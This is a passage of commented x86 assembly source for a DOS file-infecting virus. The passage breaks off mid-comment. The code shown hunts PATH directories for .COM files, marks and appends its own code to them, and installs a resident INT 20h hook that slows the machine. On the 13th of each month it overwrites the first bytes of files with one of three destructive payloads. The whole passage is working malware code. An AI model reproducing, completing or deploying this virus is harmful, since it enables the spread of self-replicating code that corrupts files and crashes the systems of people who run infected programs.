|
||||
;ÛÛ Search for the PATH ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Search_For_Path:
|
||||
POP SI ; Restore SI
|
||||
PUSH SI ; Store SI
|
||||
ADD SI,1AH ;
|
||||
LODSB ; Load the 'M' into AL
|
||||
MOV CX,8000H ;
|
||||
REPNE SCASB ;
|
||||
MOV CX,4 ;
|
||||
Path_Loop:
|
||||
LODSB ;
|
||||
SCASB ;
|
||||
JNZ Search_For_Path ;
|
||||
LOOP Path_Loop ; Pitty, PATH not yet found.
|
||||
|
||||
POP SI ; Restore SI
|
||||
POP ES ; Restore ES
|
||||
MOV [SI+16H],DI ; Store address of PATH
|
||||
MOV BX,SI ; Temp. Storage of SI
|
||||
ADD SI,26H ;
|
||||
MOV DI,SI ;
|
||||
JMP SHORT Find_First_FileName
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Error:
|
||||
CMP WORD PTR [SI+16H],0
|
||||
JNE Set_Virus_Path ;
|
||||
JMP Restore_Org_DTA ; Error occured. Restore
|
||||
; original DTA,
|
||||
; 1st three bytes and
|
||||
; execute original
|
||||
; program.
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Start Searching for PATH ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_Virus_Path:
|
||||
PUSH DS ; Store Registers
|
||||
PUSH SI
|
||||
PUSH AX
|
||||
PUSH ES
|
||||
PUSH ES
|
||||
POP DS ; DS=ES
|
||||
PUSH BX
|
||||
MOV BX,2CH
|
||||
MOV AX,[BX]
|
||||
POP BX ; Restore BX
|
||||
MOV [SI+1FH],AX ;
|
||||
MOV DI,SI ;
|
||||
MOV AX,[DI+16H] ; Org.address of PATH
|
||||
MOV SI,AX ;
|
||||
MOV DS,[DI+1FH] ;
|
||||
POP ES ;
|
||||
POP AX ;
|
||||
ADD DI,26H ;
|
||||
Reached_EO_Path:
|
||||
LODSB ; Get byte into AL
|
||||
CMP AL,3BH ; Path Delimiter ';' reached?
|
||||
JE Delimiter_Reached ; Yes
|
||||
CMP AL,0 ; End of Path reached?
|
||||
JE EO_Path_Reached ; Yes
|
||||
STOSB ; Store byte in AL
|
||||
JMP SHORT Reached_EO_Path ;
|
||||
EO_Path_Reached:
|
||||
MOV SI,0 ;
|
||||
Delimiter_Reached:
|
||||
POP BX ;
|
||||
POP DS ;
|
||||
MOV [BX+16H],SI ;
|
||||
CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by
|
||||
; a backslash?
|
||||
JE Find_First_FileName ; Yes
|
||||
MOV AL,5CH ;
|
||||
STOSB ; Place Backslash
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Find First Filename ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Find_First_FileName:
|
||||
MOV [BX+18H],DI ; Store at which address
|
||||
; the path starts
|
||||
; BX=SI
|
||||
MOV SI,BX ; Restore SI
|
||||
ADD SI,10H ;
|
||||
MOV CX,6 ;
|
||||
REP MOVSB ; Set Search.Spec.
|
||||
MOV SI,BX ; Restore SI
|
||||
|
||||
MOV AH,4EH ;
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ; Filename:= *.COM
|
||||
MOV CX,3 ; Search Attributes:
|
||||
; Read Only/Hidden
|
||||
INT 21H ; Find 1st Filename to
|
||||
; match with DS:DX
|
||||
JMP SHORT Error_Handler ;
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Find Next Filename ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Find_Next_FileName:
|
||||
MOV AH,4FH ;
|
||||
INT 21H ; Find next Filename to
|
||||
; match with DS:DX
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Error Handler ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Error_Handler:
|
||||
JNC Check_Filelength ; Jump if carry=0, so
|
||||
; no errors
|
||||
JMP SHORT Error ; Carry Set, so error
|
||||
; occured
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Check Filelength and look if file is already infected. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
Check_Filelength:
|
||||
MOV AX,DS:DATA_1E[SI] ; (761D:0064=0)
|
||||
AND AL,1FH
|
||||
CMP AL,7
|
||||
JE Find_Next_FileName ; File already infected.
|
||||
CMP WORD PTR DS:DATA_3E[SI],0FA00H
|
||||
; Is the length of the
|
||||
; file more as FA00h bytes?
|
||||
JA Find_Next_FileName ; Yes.
|
||||
CMP WORD PTR DS:DATA_3E[SI],0F00H
|
||||
; Is the length of the
|
||||
; file less as 0F00h bytes?
|
||||
JB Find_Next_FileName ; Yes
|
||||
MOV DI,[SI+18H] ; Get address of path of virus
|
||||
PUSH SI ; Store SI
|
||||
ADD SI,6CH
|
||||
Set_FileName:
|
||||
LODSB ; Set up Filename for
|
||||
STOSB ; infection.
|
||||
CMP AL,0 ; End Of Filename Reached?
|
||||
JNE Set_FileName ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set Temporary File attributes ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
POP SI ; Restore SI
|
||||
MOV CX,[SI+63H] ;
|
||||
MOV CH,0 ;
|
||||
MOV [SI+8],CX ; Get File-Attributes
|
||||
MOV AX,CX ;
|
||||
MOV CX,0FFFEH ;
|
||||
AND AX,CX ; Remove Read-Only Attribute
|
||||
MOV CX,AX ;
|
||||
MOV AX,4301H ;
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Set File-Attributes
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Open the File ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AX,3D02H ; Open the file for both
|
||||
INT 21H ; reading and writing
|
||||
JNC Give_Infection_Marker ; If no error occured...
|
||||
JMP Set_FileAttributes_Back ; Error occured
|
||||
|
||||
Give_Infection_Marker:
|
||||
MOV BX,AX
|
||||
MOV CX,DS:DATA_2E[SI] ; (761D:0066=0)
|
||||
MOV [SI+6],CX
|
||||
MOV CX,DS:DATA_1E[SI] ; (761D:0064=0)
|
||||
AND CL,0E0H
|
||||
OR CL,7
|
||||
MOV [SI+4],CX
|
||||
JMP SHORT Get_Current_Time ; (2967)
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ This Part will be installed resident after hooking INT 20h ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
PUSHF ; Push flags
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SS
|
||||
PUSH AX
|
||||
PUSH BX
|
||||
PUSH DX
|
||||
PUSH DI
|
||||
PUSH SI
|
||||
PUSH BP
|
||||
MOV DX,43H
|
||||
MOV AL,74H ; This will change the refesh
|
||||
OUT DX,AL ; rate, thus slowing down the
|
||||
MOV DX,41H ; PC. Every normal program-
|
||||
MOV AL,8 ; termination by calling
|
||||
OUT DX,AL ; INT 20h will call this
|
||||
MOV AL,7 ; rourtine
|
||||
OUT DX,AL ;
|
||||
POP BP
|
||||
POP SI
|
||||
POP DI
|
||||
POP DX
|
||||
POP BX
|
||||
POP AX
|
||||
POP SS
|
||||
POP ES
|
||||
POP DS
|
||||
POPF ; Pop flags
|
||||
JMP CS:DATA_5 ; (761D:0253=9090H)
|
||||
; JMP to org. INT 20h address
|
||||
ADD [BX+SI],AL
|
||||
ADD [BX+SI],AL
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get Current Time ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Get_Current_Time:
|
||||
PUSH AX ; Store all registers
|
||||
PUSH BX
|
||||
PUSH CX
|
||||
PUSH DX
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SI
|
||||
PUSH DI
|
||||
PUSH BP
|
||||
MOV AH,2CH ; Get current time into CX:DX
|
||||
INT 21H ; CX=hrs/min, DX=sec/hund.sec
|
||||
CMP DL,32H ; Are we above 32/100 seconds?
|
||||
JA Get_INT_F2_Vector ; Yes
|
||||
JMP Start_Trigger_Check ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Get Interrupt Vector of INT F2h ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Get_INT_F2_Vector:
|
||||
MOV AH,35H ; Get the interrupt vector of
|
||||
MOV AL,0F2H ; INT 0F2h into ES:BX
|
||||
INT 21H ;
|
||||
|
||||
CMP BX,7777H ; Was INT F2 already hooked?
|
||||
|
||||
JNE Allocate_Memory ; No
|
||||
JMP INT_F2_Already_Hooked ;
|
||||
Allocate_Memory:
|
||||
MOV AX,DS ;
|
||||
DEC AX ;
|
||||
MOV ES,AX ;
|
||||
MOV BX,0 ;
|
||||
CMP BYTE PTR ES:[BX],5AH ;
|
||||
JE Memory_Already_Allocated
|
||||
PUSH BX ;
|
||||
MOV AH,48H ; Allocate 4096 16-byte-para-
|
||||
MOV BX,0FFFFH ; graphs in memory. ???
|
||||
INT 21H ;
|
||||
CMP BX,5 ; Is the largest available
|
||||
; 5 or higher?
|
||||
JAE Again_Allocate_Memory ; Yes
|
||||
JMP Start_Trigger_Check ; No
|
||||
Again_Allocate_Memory:
|
||||
MOV AH,48H ; Again allocate memory
|
||||
INT 21H ;
|
||||
POP BX ;
|
||||
JNC Segment_Decrease ; If there was no error when
|
||||
; allocating memory the last
|
||||
; time
|
||||
JMP Start_Trigger_Check ; If there was an error
|
||||
Segment_Decrease:
|
||||
DEC AX ; Decrease Segment of Allcated
|
||||
; memory
|
||||
MOV ES,AX ;
|
||||
MOV BX,1 ;
|
||||
MOV WORD PTR ES:[BX],0 ;
|
||||
MOV BX,0 ;
|
||||
CMP BYTE PTR ES:[BX],5AH ;
|
||||
JE Memory_Allocated ;
|
||||
JMP SHORT Start_Trigger_Check
|
||||
NOP ;
|
||||
Memory_Allocated:
|
||||
MOV BX,3 ;
|
||||
ADD AX,ES:[BX] ;
|
||||
INC AX ;
|
||||
MOV BX,12H ;
|
||||
MOV ES:[BX],AX ;
|
||||
Memory_Already_Allocated:
|
||||
MOV BX,3 ;
|
||||
MOV AX,ES:[BX] ;
|
||||
SUB AX,5 ;
|
||||
JC Start_Trigger_Check ; Jump if carry Set
|
||||
MOV ES:[BX],AX ;
|
||||
MOV BX,12H ;
|
||||
SUB WORD PTR ES:[BX],5 ;
|
||||
MOV ES,ES:[BX] ;
|
||||
PUSH SI ; Store SI
|
||||
SUB SI,1F2H ; SI points to the part
|
||||
MOV DI,0 ; which must become
|
||||
MOV CX,46H ; resident.
|
||||
REP MOVSB ; Move the 46h bytes from
|
||||
; [SI] to ES:[DI]
|
||||
POP SI ; Restore SI
|
||||
MOV BP,ES ;
|
||||
PUSH CS ;
|
||||
POP ES ; Restore ES
|
||||
|
||||
MOV AH,25H ; Hook interrupt F2h
|
||||
MOV AL,0F2H ; New INT-vector will
|
||||
MOV DX,7777H ; be DS:7777h
|
||||
INT 21H ;
|
||||
JMP SHORT Hook_INT_20h ; (2A10)
|
||||
NOP
|
||||
|
||||
INT_F2_Already_Hooked:
|
||||
JMP SHORT Start_Trigger_Check
|
||||
NOP
|
||||
Hook_INT_20h:
|
||||
MOV AL,20H ;
|
||||
MOV AH,35H ; Get the INT 20h Vector
|
||||
INT 21H ; into ES:BX
|
||||
|
||||
MOV DX,ES ;
|
||||
MOV ES,BP ;
|
||||
PUSH SI ;
|
||||
MOV AX,SI ;
|
||||
SUB AX,1CAH ;
|
||||
MOV DI,SI ;
|
||||
SUB DI,1F2H ;
|
||||
SUB AX,DI ;
|
||||
MOV SI,AX ;
|
||||
MOV ES:[SI],BX ;
|
||||
ADD SI,2 ;
|
||||
MOV ES:[SI],DX ;
|
||||
SUB SI,4 ;
|
||||
MOV ES:[SI],AX ;
|
||||
POP SI ;
|
||||
PUSH CS ;
|
||||
POP ES ;
|
||||
|
||||
MOV AH,25H ; Install new INT 20h
|
||||
MOV DS,BP ; vector to DS:DX
|
||||
MOV DX,0 ; (=DS:00)
|
||||
MOV AL,20H ;
|
||||
INT 21H ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Start Trigger Check ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Start_Trigger_Check:
|
||||
POP BP ; Restore Registers
|
||||
POP DI
|
||||
POP SI
|
||||
POP ES
|
||||
POP DS
|
||||
POP DX
|
||||
POP CX
|
||||
POP BX
|
||||
POP AX
|
||||
MOV AH,2AH ; Get the current date
|
||||
INT 21H ; CX=year, DX=mon/day
|
||||
CMP DL,0DH ; Is it the 13th of the month?
|
||||
JNE Start_Infecting_File ; No
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ It is the 13th of the Month... Select 1 out of 3 destructions ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AH,2CH ; Get current time
|
||||
INT 21H ; CX=hrs/min, DX=sec/hund.sec
|
||||
CMP DL,3CH ; Are we above 60/100 seconds?
|
||||
JA Destruction_2 ; Yes
|
||||
CMP DL,1EH ; Are we above 30/100 seconds?
|
||||
JA Destruction_3 ; Yes
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 1: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: MOV AH,00 ÛÛ
|
||||
;ÛÛ INT 20h ÛÛ
|
||||
;ÛÛ NOP ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will terminate at once with returning to DOS. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV DX,SI
|
||||
ADD DX,21H
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 2: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ HLT ÛÛ
|
||||
;ÛÛ DB CDh (which is the opcode for INT) ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will execute the 4 HLT's and then perform an INT-Call depending on ÛÛ
|
||||
;ÛÛ the byte following CDh. This can be any INT-Call. So this scheme ÛÛ
|
||||
;ÛÛ can be consisered the dangeroust of all three destruction schemes. ÛÛ
|
||||
;ÛÛ will terminate at once with returning to DOS. The first five bytes ÛÛ
|
||||
;ÛÛ of a file will be overwritten always, making the file useless, but ÛÛ
|
||||
;ÛÛ issuing and 'random' INT-Call can do much more harm. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Destruction_2:
|
||||
MOV DX,SI
|
||||
ADD DX,79H
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Destruction Scheme 3: Place the following code at the begining of a ÛÛ
|
||||
;ÛÛ file: INT 19h ÛÛ
|
||||
;ÛÛ INT 19h ÛÛ
|
||||
;ÛÛ DB ? (Can be anything. It is the 1st byte of the org.file) ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ When a file is executed with this code at the begining, the program ÛÛ
|
||||
;ÛÛ will cause a reboot without a memory test and preserving the ÛÛ
|
||||
;ÛÛ interrupt vectors. If any interrupt vector from 00h through 1Ch has ÛÛ
|
||||
;ÛÛ been set, the system most likely will hang itself, because of this ÛÛ
|
||||
;ÛÛ preserving. ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Destruction_3:
|
||||
MOV DX,SI
|
||||
ADD DX,7DH
|
||||
JMP SHORT Write_5_Destruction_Bytes
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Write the 5 bytes with the destruction to the begining of the file ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Write_5_Destruction_Bytes:
|
||||
MOV AH,40H ;
|
||||
MOV CX,5 ;
|
||||
INT 21H ; Write 5 bytes to the file
|
||||
JMP SHORT Set_FileDate_Time_Back
|
||||
NOP
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ It is not the 13th of the month... Infect the file ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Start_Infecting_File:
|
||||
MOV AH,3FH ;
|
||||
MOV CX,3 ; Number of bytes to read
|
||||
MOV DX,0AH ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Read the bytes from the file
|
||||
; and put them at DS:DX
|
||||
JC Set_FileDate_Time_Back ; If Error Occurred
|
||||
CMP AL,3 ; 3 Bytes read?
|
||||
JNE Set_FileDate_Time_Back ; No
|
||||
|
||||
|
||||
MOV AX,4202H ; Set the Read/Write
|
||||
MOV CX,0 ; pointer to the EOF at
|
||||
MOV DX,0 ; offset CX:DX (=00:00)
|
||||
INT 21H ;
|
||||
|
||||
MOV CX,AX ; CX=Length of File
|
||||
SUB AX,3 ;
|
||||
MOV [SI+0EH],AX ; Store Length -3 bytes
|
||||
ADD CX,41DH ; CX=CX+41Dh
|
||||
MOV DI,SI
|
||||
SUB DI,318H
|
||||
MOV [DI],CX ; Set new Virus Data Area
|
||||
; Address into code
|
||||
MOV AH,40H ;
|
||||
MOV CX,3ABH ; CX=3ABh The length of the
|
||||
; viral-code written to disk.
|
||||
MOV DX,SI
|
||||
SUB DX,31DH ; DX points at the start of
|
||||
; the virus code
|
||||
INT 21H ; Write the viral-code to the
|
||||
; file
|
||||
|
||||
JC Set_FileDate_Time_Back ; If an error occured
|
||||
CMP AX,3ABH ; 3ABh bytes written?
|
||||
JNE Set_FileDate_Time_Back ; No
|
||||
MOV AX,4200H ; Move Read/Write Pointer to
|
||||
MOV CX,0 ; the beginning of the file
|
||||
MOV DX,0 ; at offset CX:DX(=00:00)
|
||||
INT 21H ;
|
||||
|
||||
MOV AH,40H ; Write the 1st three new
|
||||
